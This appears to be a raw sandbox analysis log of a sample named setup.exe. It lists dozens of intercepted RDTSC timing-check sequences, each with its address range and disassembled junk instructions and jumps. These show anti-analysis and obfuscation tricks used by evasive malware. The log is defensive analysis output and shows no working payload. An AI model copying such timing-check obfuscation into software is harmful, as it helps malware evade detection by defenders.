Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 53745A second address: 53745E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 53745E second address: 537462 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 537462 second address: 53746E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F47CD361206h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 53F557 second address: 53F55B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 53F55B second address: 53F565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 53F565 second address: 53F56F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F47CD346616h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 53F56F second address: 53F575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5455FB second address: 5455FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5455FF second address: 545609 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F47CD361206h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 545758 second address: 54575C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54575C second address: 54577F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F47CD361206h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 je 00007F47CD36120Eh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5561BC second address: 5561C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5561C3 second address: 5561C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5561C9 second address: 5561CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5561CF second address: 5561EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F47CD361211h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5561EB second address: 55620A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47CD346629h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 55620A second address: 556210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 556210 second address: 556224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnl 00007F47CD346616h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 55DCC2 second address: 55DCCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F47CD361206h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 55DCCE second address: 55DCD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 55DCD2 second address: 55DD18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47CD361212h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jg 00007F47CD361206h 0x00000012 pop ecx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 pushad 0x00000017 jmp 00007F47CD361217h 0x0000001c ja 00007F47CD361206h 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 55DD18 second address: 55DD1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 55DD1C second address: 55DD20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 55E273 second address: 55E284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ecx 0x00000007 jmp 00007F47CD34661Ah 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 55E284 second address: 55E2A1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F47CD361208h 0x00000008 pushad 0x00000009 popad 0x0000000a jng 00007F47CD361208h 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 js 00007F47CD361206h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 55E2A1 second address: 55E2A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5606CA second address: 5606D9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnc 00007F47CD361206h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5606D9 second address: 5606E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jng 00007F47CD346616h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 558451 second address: 558457 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 558457 second address: 55845B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 55845B second address: 558461 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 56F8DF second address: 56F903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47CD346624h 0x00000009 jp 00007F47CD346616h 0x0000000f popad 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 56FA31 second address: 56FA3B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F47CD361206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 56FA3B second address: 56FA42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 56FA42 second address: 56FA53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F47CD361206h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57AEB7 second address: 57AEBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 579E0D second address: 579E15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 579E15 second address: 579E23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jp 00007F47CD346616h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 579E23 second address: 579E50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F47CD361212h 0x00000010 jmp 00007F47CD361210h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 579E50 second address: 579E56 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 579E56 second address: 579E69 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnp 00007F47CD361206h 0x00000009 jne 00007F47CD361206h 0x0000000f pop esi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 579FA2 second address: 579FD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F47CD346616h 0x0000000a jmp 00007F47CD346629h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F47CD346621h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 579FD8 second address: 579FDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 579FDC second address: 579FEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jne 00007F47CD346618h 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 579FEF second address: 579FFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 js 00007F47CD361206h 0x0000000c pop ecx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57A1A4 second address: 57A1C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F47CD346623h 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F47CD346616h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57A5B9 second address: 57A5BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57A5BF second address: 57A5FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD346624h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 jnp 00007F47CD346616h 0x00000016 popad 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F47CD346621h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57A767 second address: 57A794 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F47CD36120Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F47CD361217h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57A8E2 second address: 57A8E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57A8E8 second address: 57A90C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47CD361217h 0x00000009 popad 0x0000000a jl 00007F47CD36120Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57A90C second address: 57A91C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jnp 00007F47CD346618h 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57F0D6 second address: 57F13F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F47CD361206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F47CD36120Bh 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F47CD361208h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b movsx edx, dx 0x0000002e push 00000004h 0x00000030 mov dl, 75h 0x00000032 call 00007F47CD361209h 0x00000037 jne 00007F47CD361210h 0x0000003d push eax 0x0000003e pushad 0x0000003f pushad 0x00000040 push esi 0x00000041 pop esi 0x00000042 pushad 0x00000043 popad 0x00000044 popad 0x00000045 push eax 0x00000046 push edx 0x00000047 ja 00007F47CD361206h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57F381 second address: 57F3EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop ecx 0x00000009 popad 0x0000000a nop 0x0000000b jmp 00007F47CD346621h 0x00000010 mov dword ptr [ebp+122D35F2h], ecx 0x00000016 push dword ptr [ebp+122D352Ah] 0x0000001c push 00000000h 0x0000001e push ebp 0x0000001f call 00007F47CD346618h 0x00000024 pop ebp 0x00000025 mov dword ptr [esp+04h], ebp 0x00000029 add dword ptr [esp+04h], 00000018h 0x00000031 inc ebp 0x00000032 push ebp 0x00000033 ret 0x00000034 pop ebp 0x00000035 ret 0x00000036 jmp 00007F47CD34661Dh 0x0000003b push 250D8F82h 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 pushad 0x00000044 popad 0x00000045 jmp 00007F47CD34661Eh 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57F3EF second address: 57F3F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57F3F5 second address: 57F3F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 580558 second address: 580566 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnl 00007F47CD361206h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 581F0F second address: 581F19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 581F19 second address: 581F1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 581F1D second address: 581F2E instructions: 0x00000000 rdtsc 0x00000002 js 00007F47CD346616h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 581F2E second address: 581F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 581F36 second address: 581F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F47CD346616h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 583EE9 second address: 583EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 583EED second address: 583F07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD346624h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 583F07 second address: 583F17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47CD36120Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 583F17 second address: 583F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 583F1B second address: 583F1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5060D28 second address: 5060D50 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 752C2191h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b jmp 00007F47CD34661Ch 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F47CD34661Eh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5060D50 second address: 5060D77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD36120Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F47CD361215h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 508005F second address: 5080083 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD346629h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080083 second address: 5080087 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080087 second address: 508008D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 508008D second address: 50800FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F47CD36120Bh 0x00000009 adc cx, 3E5Eh 0x0000000e jmp 00007F47CD361219h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F47CD361210h 0x0000001a jmp 00007F47CD361215h 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 jmp 00007F47CD361213h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50800FE second address: 5080103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080103 second address: 5080119 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47CD361212h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080119 second address: 508015B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD34661Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushfd 0x00000013 jmp 00007F47CD346621h 0x00000018 adc si, 20B6h 0x0000001d jmp 00007F47CD346621h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 508015B second address: 5080177 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD361211h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080177 second address: 508017B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 508017B second address: 508018E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD36120Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 508018E second address: 5080194 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5070DBA second address: 5070DC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5070DC0 second address: 5070E3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD34661Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ax, bx 0x0000000e pushfd 0x0000000f jmp 00007F47CD34661Dh 0x00000014 add esi, 5C4D36C6h 0x0000001a jmp 00007F47CD346621h 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 jmp 00007F47CD34661Eh 0x00000027 mov ebp, esp 0x00000029 jmp 00007F47CD346620h 0x0000002e push dword ptr [ebp+04h] 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F47CD346627h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5070E3B second address: 5070E41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5070E41 second address: 5070E45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5070E45 second address: 5070E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b jmp 00007F47CD361217h 0x00000010 push dword ptr [ebp+08h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5070E70 second address: 5070E74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5070E74 second address: 5070E7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5070EC9 second address: 5070ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5070ECD second address: 5070ED3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50801B3 second address: 50801CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD346627h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50801CE second address: 50801D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50801D4 second address: 50801D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
